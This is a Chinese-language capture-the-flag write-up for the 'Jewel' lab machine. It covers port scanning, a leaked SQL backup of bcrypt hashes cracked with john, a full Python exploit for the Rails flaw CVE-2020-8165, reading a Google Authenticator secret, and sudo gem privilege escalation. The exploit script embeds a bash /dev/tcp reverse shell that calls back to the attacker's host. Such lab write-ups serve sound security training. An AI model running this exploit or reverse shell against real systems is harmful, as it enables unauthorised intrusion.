基本信息

端口扫描

常规的22,8000,8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ nmap -Pn -sC -sV 10.10.10.211
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-27 08:50 CST
Nmap scan report for 10.10.10.211
Host is up (0.069s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.17 seconds

8000

8000是gitweb:

8080

8080是一个blog:

gitweb

8000的gitweb简单浏览能发现一些文件,其中有一个bd.sql是sql备份文件:

1
http://10.10.10.211:8000/gitweb/?p=.git;a=blob;f=bd.sql;h=a7fddb693ca735f8aa1e4b09046cec2adddddc51;hb=HEAD

bd.sql

在sql文件中得到用户信息:

1
2
3
4
COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
1	bill	bill@mail.htb	2020-08-25 08:13:58.662464	2020-08-25 08:13:58.662464	$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
2	jennifer	jennifer@mail.htb	2020-08-25 08:54:42.8483	2020-08-25 08:54:42.8483	$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
\.

john

对得到的Hash进行破解,hash是bcrypt加密格式,破解失败(兔子洞):

1
2
3
4
5
6
7
8
9
10
11
➜  Jewel cat hashes.txt
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy

➜  Jewel sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

BL0G

转到8080 blog,随意注册一个账号登录:

rails

1
http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741

根据8000端口gitweb上面的信息,这个blog应该是基于ruby rails,并且rails版本是5.2.2.1:

搜索得到CVE-2020-8165:

之后就是一步步打,或者直接用脚本

CVE-2020-8165.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/python
#

import requests
import re
import sys

URL='http://{}:8080'.format(sys.argv[1])
username='miao'
password='123456'
email='miao@miao.com'

if len(sys.argv) != 4:
	print("specify target IP, your IP and port: python3 rev.py 10.10.xx.xx 9001")
	exit(0)

s = requests.Session()

resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'

token = re.search(rx,resp.text).group(1)

# create user
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)

# login
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)

rx = r'href="/users/(.*)"'
user_id = re.search(rx,resp.text).group(1)

# rev shell
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev)+7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'

data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)

s.get(URL + '/articles')

user flag

打到bill用户的shell,在用户目录得到userx.txt:

1
python3 CVE-2020-8165.py 10.10.10.211 10.10.14.7 4445

提权信息

/home/bill/blog/bd.sql

Blog目录也有个bd.sql:

1
2
3
4
COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
1	bill	bill@mail.htb	2020-08-25 08:13:58.662464	2020-08-25 08:13:58.662464	$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
2	jennifer	jennifer@mail.htb	2020-08-25 08:54:42.8483	2020-08-25 08:54:42.8483	$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
\.

/var/backups/dump_2020-08-27.sql

backups目录也有个sql文件:

1
2
3
4
COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
2	jennifer	jennifer@mail.htb	2020-08-27 05:44:28.551735	2020-08-27 05:44:28.551735	$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
1	bill	bill@mail.htb	2020-08-26 10:24:03.878232	2020-08-27 09:18:11.636483	$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
\.

hash crack

再次尝试破解这些hash,这次解出来一个:

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  Jewel cat hashes.txt
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
➜  Jewel sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob        (?)

这个密码是bill用户的,但尝试sudo -l后还需要一个验证码:

.google_authenticator

在bill用户目录发现隐藏文件.google_authenticator:

1
2
3
4
5
6
bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
bill@jewel:~$

得到OTP生成的secret,然后随便找个生成工具就可以生成OTP:

sudo -l

sudo -l显示可以可以使用gem:

利用方式:

提权 & root flag

然后就是一键root,得到root.txt:

参考资料